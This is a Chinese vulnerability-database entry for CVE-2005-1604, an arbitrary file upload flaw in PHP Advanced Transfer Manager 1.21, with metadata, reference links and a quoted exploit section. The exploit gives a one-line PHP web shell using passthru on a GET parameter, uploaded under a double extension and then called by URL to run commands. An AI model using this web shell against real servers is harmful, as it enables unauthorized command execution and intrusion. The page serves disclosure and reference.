PHP Advanced Transfer Manager任意文件上载漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108753 漏洞类型 输入验证
发布时间 2005-05-06 更新时间 2006-09-07
CVE编号 CVE-2005-1604 CNNVD-ID CNNVD-200505-1061
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/25627
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-1061
|漏洞详情
PHPAdvancedTransferManager(phpATM)1.21允许远程攻击者通过含有多个文件扩展名的文件名来上载任意文件,如使用以"php.ns"结尾的文件名,从而让系统执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/13542/info

PHP Advanced Transfer Manager is prone to a vulnerability regarding the uploading of arbitrary files.

If successfully exploited, an attacker can execute arbitrary script code on a vulnerable server. This can lead to unauthorized access in the context of the affected server.

This issue reportedly affects PHP Advanced Transfer Manager version 1.21; earlier versions may also be vulnerable. 

Create file:
nst.php.ns

<pre>
<?
passthru($_GET['nst']);
?>

Then upload, and go to http://www.example.com/files/nst.php.ns?nst=ls -la

or

<?
passthru($_GET['nst']);
?>

Then upload, and go to http://example.com/files/nst.php.ns?nst=http://your/file.txt
|参考资料

来源:BID
名称:13542
链接:http://www.securityfocus.com/bid/13542
来源:BUGTRAQ
名称:20051029uplodphpshellinPHPAdvancedTransferManager
链接:http://www.securityfocus.com/archive/1/archive/1/415172
来源:BUGTRAQ
名称:20051030Re:uplodphpshellinPHPAdvancedTransferManager
链接:http://www.securityfocus.com/archive/1/415300/30/0/threaded
来源:OSVDB
名称:16160
链接:http://www.osvdb.org/16160
来源:SECUNIA
名称:15279
链接:http://secunia.com/advisories/15279
来源:BUGTRAQ
名称:20050506PHPAdvancedTransferManagerv1.21
链接:http://seclists.org/lists/bugtraq/2005/May/0075.html